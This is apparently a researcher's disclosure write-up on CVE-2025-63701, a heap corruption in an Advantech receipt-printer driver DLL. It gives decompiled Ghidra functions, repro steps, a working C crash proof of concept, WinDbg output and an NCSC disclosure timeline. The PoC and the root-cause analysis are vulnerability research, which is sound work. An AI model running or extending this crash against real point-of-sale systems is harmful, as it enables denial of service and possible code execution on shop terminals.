   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000001
   Parameter[1]: 000001c5b6965000
Attempt to write to address 000001c5b6965000

PROCESS_NAME:  ex.exe

WRITE_ADDRESS:  000001c5b6965000

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000001

EXCEPTION_PARAMETER2:  000001c5b6965000

STACK_TEXT:
00000061`74dff620 00007ffd`5c545651     : 00000000`00000000 00000061`74dffcc0 000001c5`b55e0000 00007ffd`71a8cd51 : DrvRender_x64_ADVANTECH!DrvEnableDriver+0x6bbc
00000061`74dff7c0 00007ff6`73dd1863     : 00007ff6`40000000 00000000`00000008 00000000`00000008 00000061`74dfdf70 : DrvRender_x64_ADVANTECH!DrvEnableDriver+0x480d
00000061`74dffc80 00007ff6`73dd1307     : 00000000`00000000 00000000`00000014 00007ff6`73ddc048 00000000`00000000 : ex+0x1863
00000061`74dffd50 00007ff6`73dd142a     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ex!__tmainCRTStartup+0x177
00000061`74dffdb0 00007ffd`71267374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ex!mainCRTStartup+0x1a
00000061`74dffde0 00007ffd`71a7cc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
00000061`74dffe10 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_NAME:  DrvRender_x64_ADVANTECH+6bbc

MODULE_NAME: DrvRender_x64_ADVANTECH

IMAGE_NAME:  DrvRender_x64_ADVANTECH.dll

BUCKET_ID_MODPRIVATE: 1

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_AVRF_c0000005_DrvRender_x64_ADVANTECH.dll!Unknown

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

IMAGE_VERSION:  0.3.9600.17336

FAILURE_ID_HASH:  {28021f10-bbf5-db82-dbf6-c0ff68f801c3}

Followup:     MachineOwner
---------

Relevant Resources:

• Advantech URP-PT802/PT803 Driver Download Official driver package containing the vulnerable DLL
• Microsoft DRVFN Documentation Official documentation on the DRVENABLEDATA structure and DRVFN table
• CWE-190: Integer Overflow or Wraparound The vulnerability class this bug belongs to I think
• Ghidra The reverse engineering tool I used for analysis
• WinDbg Documentation Windows debugger used for crash analysis
• NCSC Vulnerability Disclosure Policy Coordinated disclosure process followed

• CVE ID: CVE-2025-63701
• There is a bug in the DrvUI_x64_ADVANTECH.dll when DocumentPropertiesW() is called with a valid dmDriverExtra but an undersized output buffer.
• I was only able to cause a crash, but I think you could move it to a code execution, but that would only be in the user space and not kernel.
• Minimal crash PoC can be found in the appendix.
• Affected dll: DrvUI_x64_ADVANTECH.dll (v0.3.9200.20789).
• Driver can be found here: Advantech URP-PT802/PT803 Driver Download this uses the same TP 3250 driver under the hood.

Background:

Recently while doing some reading on security news, I had reaslised that I had never really done any research into any windows drivers. I also noticed that almost every shop that I go into has a receipt printer! So I thought this would be an amazing target, as I had also noticed that 99% of the POS terminals I have seen also run windows (an outdated one at that). Choosing Advantech was just the first brand of printer I saw at my local takeaway. This was also my first forray into learning ghidra in any real detail, and it was a lot of fun!

Test env:

• Virtual box running Microsoft Windows 10 build 19041 x64
• Clean VM with only Windgb, Vbox additions, and the driver installed.
• A remote path to my host machine to move exes and other files around.

Repro:

1: Compile the crash_min.c file in the appendix eg: x86_64-w64-mingw32-gcc crash_min.c -o crash_min.exe -lwinspool

2: Enable crash dumps on the Windows system. Run the following commands in Admin Powershell:

New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" -Force | Out-Null
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" `
  -Name "DumpFolder" -Value "C:\Dumps" -PropertyType ExpandString -Force | Out-Null
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" `
  -Name "DumpType"  -Value 2 -PropertyType DWord -Force | Out-Null   # 2 = Full dump
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps" `
  -Name "DumpCount" -Value 10 -PropertyType DWord -Force | Out-Null

3: Install the driver from the above link (in TLDR)

4: Run the compiled code, and view the crash_min.exe.2896 file in the C:\Dumps\ dir This should match the crash output in the appendix :)

The Bug

The bug lies in the drivers assumption that the output buffer that has been given to it is as big as the buffer given as the input. However since both of these are user controlled you can make that not so. With an undersized output buffer you can force the down stream logic to perform an invalid free on the heap memory that it thinks it owns.

What this looks like it Ghidra

First things first, since I was looking at memory level issues, I did the basic search for malloc, memcpy, new and free.

memcpy seemed to show the most interesting things, these are the functions that looked interesting to me, and are the root of this bug:

But first here is a simplified call graph: DocumentPropertiesW → DrvDocumentPropertySheets → FUN_180027d30 → FUN_180027c0c → memcpy(…) → heap corruption

For reference here are the offsets that are used in the functions:

DrvDocumentPropertySheets(param_1, param_2) →
param_2+0x18 = pdmIn,
param_2+0x20 = pdmOut,
param_2+0x2C = fMode,
param_2+0x28 = cbNeeded.

FUN_180027d30(pIn, pIn2, pOut)

If pIn2 == NULL: memcpy(pOut, pIn, pIn->dmSize + pIn->dmDriverExtra) - This will might be another bug…

If pIn2 != NULL (PoC path):

Sets pOut->dmSize = min(pIn->dmSize, pIn2->dmSize)

Sets pOut->dmDriverExtra = min(pIn->dmDriverExtra, pIn2->dmDriverExtra)

Calls FUN_180027c0c(pIn, pOut) to perform the actual header+tail copies.

FUN_180027c0c(pIn, pOut)

Copies Header bytes: hdr = min(pIn->dmSize, pOut->dmSize) memcpy(pOut, pIn, hdr)

Copies tail or extra bytes: tail = min(pIn->dmDriverExtra, pOut->dmDriverExtra) memcpy((BYTE*)pOut + pOut->dmSize, (BYTE*)pIn + pIn->dmSize, tail)

By design this should write a total of hdr + tail bytes However if pOut is less that written we will get our bug.

Full functions

int DrvDocumentPropertySheets(longlong param_1,longlong param_2)

{
  uint uVar1;
  longlong lVar2;
  int iVar3;
  HANDLE *ppvVar4;
  int iVar5;
  iVar5 = -1;
                    /* 0x12a50  261  DrvDocumentPropertySheets */
  iVar3 = -1;
  if (param_1 == 0) {
    if (param_2 != 0) {
      uVar1 = *(uint *)(param_2 + 0x2c);
      if ((uVar1 == 0) || (*(longlong *)(param_2 + 0x20) == 0)) {
        iVar3 = 0x1250;
        *(undefined4 *)(param_2 + 0x28) = 0x1250;
      }
      else if (((uVar1 & 3) == 0) || ((uVar1 & 0x20) != 0)) {
        iVar3 = 1;
      }
      else {
        ppvVar4 = FUN_180012d88(*(HANDLE *)(param_2 + 8),*(void **)(param_2 + 0x18),0,0);
        if (ppvVar4 != (HANDLE *)0x0) {
          FUN_180027d30((void *)((longlong)ppvVar4 + 0x3c),*(longlong *)(param_2 + 0x18),
                        *(void **)(param_2 + 0x20));
          iVar3 = 1;
          FUN_180012f3c(ppvVar4);
        }
      }
    }
  }
  ...

bool FUN_180027d30(void *param_1,longlong param_2,void *param_3)

{
  undefined2 uVar1;
  int iVar2;
  if (param_2 == 0) {
    ...
  }
  else if ((param_1 != (void *)0x0) && (param_3 != (void *)0x0)) {
    if (*(ushort *)(param_2 + 0x44) < *(ushort *)((longlong)param_1 + 0x44)) {
      *(undefined2 *)((longlong)param_3 + 0x40) = *(undefined2 *)(param_2 + 0x40);
      uVar1 = *(undefined2 *)(param_2 + 0x44);
    }
    else {
      *(undefined2 *)((longlong)param_3 + 0x40) = *(undefined2 *)((longlong)param_1 + 0x40);
      uVar1 = *(undefined2 *)((longlong)param_1 + 0x44);
    }
    *(undefined2 *)((longlong)param_3 + 0x44) = uVar1;
    if (*(ushort *)(param_2 + 0x46) < *(ushort *)((longlong)param_1 + 0x46)) {
      *(undefined2 *)((longlong)param_3 + 0x42) = *(undefined2 *)(param_2 + 0x42);
      *(undefined2 *)((longlong)param_3 + 0x46) = *(undefined2 *)(param_2 + 0x46);
    }
    else {
      *(undefined2 *)((longlong)param_3 + 0x42) = *(undefined2 *)((longlong)param_1 + 0x42);
      *(undefined2 *)((longlong)param_3 + 0x46) = *(undefined2 *)((longlong)param_1 + 0x46);
    }
    iVar2 = FUN_180027c0c(param_1,param_3);
    return 0 < iVar2;
  }
  return false;
}

int FUN_180027c0c(void *param_1,void *param_2)

{
  ushort uVar1;
  undefined2 uVar2;
  ushort uVar3;
  ushort uVar4;
  ushort uVar5;
  short sVar6;
  short sVar7;
  uint uVar8;
  int iVar9;

  if (param_2 == (void *)0x0) {
LAB_180027d06:
    iVar9 = -1;
  }
  else {
    uVar8 = (uint)*(ushort *)((longlong)param_1 + 0x44);
    sVar7 = 800;
    if (uVar8 == 0xbc) {
      ...
    }
    else {
      if (uVar1 != 0xdc) {
        sVar7 = *(short *)((longlong)param_2 + 0x40);
        goto LAB_180027c88;
      }
      sVar7 = 0x401;
    }
    uVar2 = *(undefined2 *)((longlong)param_2 + 0x42);
    uVar3 = *(ushort *)((longlong)param_2 + 0x46);
    if (uVar1 < *(ushort *)((longlong)param_1 + 0x44)) {
      uVar8 = (uint)uVar1;
    }
    memcpy(param_2,param_1,(longlong)(int)uVar8);
    *(short *)((longlong)param_2 + 0x40) = sVar7;
    *(undefined2 *)((longlong)param_2 + 0x42) = uVar2;
    *(ushort *)((longlong)param_2 + 0x44) = uVar1;
    *(ushort *)((longlong)param_2 + 0x46) = uVar3;
    uVar4 = *(ushort *)((longlong)param_1 + 0x46);
    uVar5 = uVar3;
    if (uVar4 <= uVar3) {
      uVar5 = uVar4;
    }
    iVar9 = uVar8 + uVar5;
    if (uVar3 < uVar4) {
      uVar4 = uVar3;
    }
    memcpy((void *)((longlong)param_2 + (ulonglong)uVar1),
           (void *)((ulonglong)*(ushort *)((longlong)param_1 + 0x44) + (longlong)param_1),
           (longlong)(int)(uint)uVar4);
  }
  return iVar9;
}

Now the main issue here is that final memcpy, it is assuming that the output ((void *)((longlong)param_2 + (ulonglong)uVar1)) has been allocated with at least the required amout of memory.

Impact:

• This is ONLY in user space so there is no risk of Kernel comprimise here, this is a user-mode DLL not a kernel mode.
• Due to the above I dont think its possible for privilege escalation.
• This can cause a dos attack on any process that is trying to invoke the DocumentPropertiesW
• Since this is a heap corruption error in usermode then I think someone smarter than me would be able to move this into code execution.

Timeline:

• Tue, Jul 29 2025: Bug discovered and reported to NCSC
• Fri, Aug 1 2025: Response from NCSC
• Wed, Aug 13 2025: NCSC reported bug to vendor
• Mon, Oct 6 2025: NCSC informed me that the disclosure period has ended and I am free to post about this.
• Sat, Oct 11 2025: Applied for CVE via Mitre
• Sat, Nov 15 2025: CVE-2025-63701 published on mitre.org

Appendix:

A - POC

Note that this is just to show the crash, and this is not publishing any real exploit.

#include <windows.h>
#include <winspool.h>
#include <stdio.h>

int main() {
    HANDLE hPrinter;
    WCHAR printerName[] = L"TP 3250"; // Is this always the same for all printers?? doesnt feel right ..

    if (!OpenPrinterW(printerName, &hPrinter, NULL)) {
        printf("OpenPrinterW failed: %lu\n", GetLastError());
        return 1;
    }

    printf("OpenPrinterW successful: handle = %p\n", hPrinter);

    DWORD extra = 0x740;
    DWORD outBufSize = 320;
    BYTE inputBuf[0x800] = {0};
    PDEVMODEW pIn = (PDEVMODEW)inputBuf;
    wcscpy(pIn->dmDeviceName, printerName);
    pIn->dmSize = sizeof(DEVMODEW);
    pIn->dmDriverExtra = extra;

    BYTE *outBuf = (BYTE*)malloc(outBufSize);
    if (!outBuf) {
        printf("wtf failed to allocate output buffer\n");
        ClosePrinter(hPrinter);
        return 1;
    }
    memset(outBuf, 0xCC, outBufSize);

    printf("calling DocumentPropertiesW() with dmDriverExtra = 0x%lx, outBuf = %lu bytes\n", extra, outBufSize);
    LONG r = DocumentPropertiesW(NULL, hPrinter, printerName, (PDEVMODEW)outBuf, pIn, DM_OUT_BUFFER | DM_IN_BUFFER);

    if (r == IDOK) {
        printf("DocumentPropertiesW returned: %ld\n", r);
    } else {
        printf("DocumentPropertiesW failed with:  %lu\n", GetLastError());
    }

    free(outBuf);
    ClosePrinter(hPrinter);
    return 0;
}

B - WinDbg output

0:000> !analyze -v
.........................
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Check Image - Checksum mismatch - Dump: 0x1f3b32, File: 0x1fd444 - C:\ProgramData\Dbg\sym\ntdll.dll\D1CD38081F8000\ntdll.dll
Unable to load image \\VBOXSVR\advantech\crash_min.exe, Win32 error 0n2

KEY_VALUES_STRING: 1

    Key  : Analysis.CPU.mSec
    Value: 1015

    Key  : Analysis.Elapsed.mSec
    Value: 32828

    Key  : Analysis.IO.Other.Mb
    Value: 0

    Key  : Analysis.IO.Read.Mb
    Value: 1

    Key  : Analysis.IO.Write.Mb
    Value: 0

    Key  : Analysis.Init.CPU.mSec
    Value: 781

    Key  : Analysis.Init.Elapsed.mSec
    Value: 45351

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 83

    Key  : Analysis.Version.DbgEng
    Value: 10.0.27871.1001

    Key  : Analysis.Version.Description
    Value: 10.2505.01.02 amd64fre

    Key  : Analysis.Version.Ext
    Value: 1.2505.1.2

    Key  : Failure.Bucket
    Value: HEAP_CORRUPTION_ACTIONABLE_ListEntryCorruption_c0000374_DrvUI_x64_ADVANTECH.dll!Unknown

    Key  : Failure.Exception.Code
    Value: 0xc0000374

    Key  : Failure.Exception.IP.Address
    Value: 0x7ffc995ef3c9

    Key  : Failure.Exception.IP.Module
    Value: ntdll

    Key  : Failure.Exception.IP.Offset
    Value: 0xff3c9

    Key  : Failure.Hash
    Value: {f73b6e40-eff5-e543-d66a-d70b778facc2}

    Key  : Failure.ProblemClass.Primary
    Value: HEAP_CORRUPTION

    Key  : Timeline.OS.Boot.DeltaSec
    Value: 1252

    Key  : Timeline.Process.Start.DeltaSec
    Value: 8

    Key  : WER.OS.Branch
    Value: vb_release

    Key  : WER.OS.Version
    Value: 10.0.19041.1


FILE_IN_CAB:  crash_min.exe.2896.dmp

NTGLOBALFLAG:  40000400

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  (.ecxr)
rax=0000000000000000 rbx=00000000c0000374 rcx=0000000000000000
rdx=0000000000000000 rsi=0000000000000001 rdi=00007ffc996597f0
rip=00007ffc995ef3c9 rsp=00000012c47fe880 rbp=0000000000000000
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=0000000000000000 r12=0000017919ed0150 r13=0000000000000000
r14=0000017919ed5c10 r15=0000017919ed1820
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!RtlReportFatalFailure+0x9:
00007ffc`995ef3c9 eb00            jmp     ntdll!RtlReportFatalFailure+0xb (00007ffc`995ef3cb)
Resetting default scope

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffc995ef3c9 (ntdll!RtlReportFatalFailure+0x0000000000000009)
   ExceptionCode: c0000374
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 00007ffc996597f0

PROCESS_NAME:  crash_min.exe

ERROR_CODE: (NTSTATUS) 0xc0000374 - A heap has been corrupted.

EXCEPTION_CODE_STR:  c0000374

EXCEPTION_PARAMETER1:  00007ffc996597f0

STACK_TEXT:
00000012`c47fe880 00007ffc`995ef393     : 00007ffc`99636e80 00000012`c47ff830 00000000`00000000 00000000`00000000 : ntdll!RtlReportFatalFailure+0x9
00000012`c47fe8d0 00007ffc`995f8112     : 00000000`00000000 00007ffc`996597f0 00000000`0000000d 00000179`19ed0000 : ntdll!RtlReportCriticalFailure+0x97
00000012`c47fe9c0 00007ffc`995f83fa     : 00000000`0000000d 00000000`00000000 00000179`19ed0000 00000000`00000000 : ntdll!RtlpHeapHandleError+0x12
00000012`c47fe9f0 00007ffc`995fe081     : 00000179`19ed0000 00000179`19ed5af0 00000000`00000000 00000000`00000000 : ntdll!RtlpHpHeapHandleError+0x7a
00000012`c47fea20 00007ffc`99516625     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlpLogHeapFailure+0x45
00000012`c47fea50 00007ffc`99515b74     : 00000179`19ed0000 00000179`19ed0000 00000179`19ed5af0 00000179`19ed0000 : ntdll!RtlpFreeHeap+0xa25
00000012`c47fec00 00007ffc`995147b1     : 00000012`c47fef10 00000179`19ed0000 00000000`00000000 00000000`00000000 : ntdll!RtlpFreeHeapInternal+0x464
00000012`c47fecc0 00007ffc`992e9c9c     : 00000179`19ed6140 00000179`19ed6140 00000179`19c05e20 00000000`00000000 : ntdll!RtlFreeHeap+0x51
00000012`c47fed00 00007ffc`58ce2f5c     : 00000000`00000000 00000000`00000000 00000179`19ed6140 00000012`c47fee20 : msvcrt!free+0x1c
00000012`c47fed30 00007ffc`58ce2b62     : 00000000`00000001 00000000`00000000 00007ffc`58cd0000 00000012`c47fee20 : DrvUI_x64_ADVANTECH!DevQueryPrintEx+0x1e0
00000012`c47fed60 00007ffc`60718a76     : ffffffff`ffffffff 00000000`00000000 00007ffc`58cd0000 00000000`00000000 : DrvUI_x64_ADVANTECH!DrvDocumentPropertySheets+0x112
00000012`c47feda0 00007ffc`6071732a     : 00000000`0000000a 00000000`0000000a 00000012`c47fee50 00000012`c47fef10 : winspool!DocumentPropertySheets+0xc6
00000012`c47fedf0 00007ffc`60716b3f     : 00000000`0000000a 00000179`19c05e20 00000000`0000081c 00000012`c47fef10 : winspool!DocumentPropertiesWNative+0xce
00000012`c47fee80 00007ff7`911c1692     : 00000000`00000008 00000012`c47fef60 00000000`00000022 00000012`c47ff710 : winspool!DocumentPropertiesW+0x8f
00000012`c47feee0 00007ff7`911c1307     : 00000000`00000000 00000000`00000022 00007ff7`911cc048 00000000`00000000 : crash_min+0x1692
00000012`c47ff770 00007ff7`911c142a     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : crash_min+0x1307
00000012`c47ff7d0 00007ffc`97ab7374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : crash_min+0x142a
00000012`c47ff800 00007ffc`9953cc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
00000012`c47ff830 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_NAME:  DrvUI_x64_ADVANTECH+12f5c

MODULE_NAME: DrvUI_x64_ADVANTECH

IMAGE_NAME:  DrvUI_x64_ADVANTECH.dll

BUCKET_ID_MODPRIVATE: 1

FAILURE_BUCKET_ID:  HEAP_CORRUPTION_ACTIONABLE_ListEntryCorruption_c0000374_DrvUI_x64_ADVANTECH.dll!Unknown

OS_VERSION:  10.0.19041.1

BUILDLAB_STR:  vb_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

IMAGE_VERSION:  0.3.9200.20789

FAILURE_ID_HASH:  {f73b6e40-eff5-e543-d66a-d70b778facc2}

Followup:     MachineOwner

Relevant Resources:

• CVE-2025-63701
• DocumentProperties function
• Print Job Functions
• CWE-122: Heap-based Buffer Overflow
• Ghidra
• WinDbg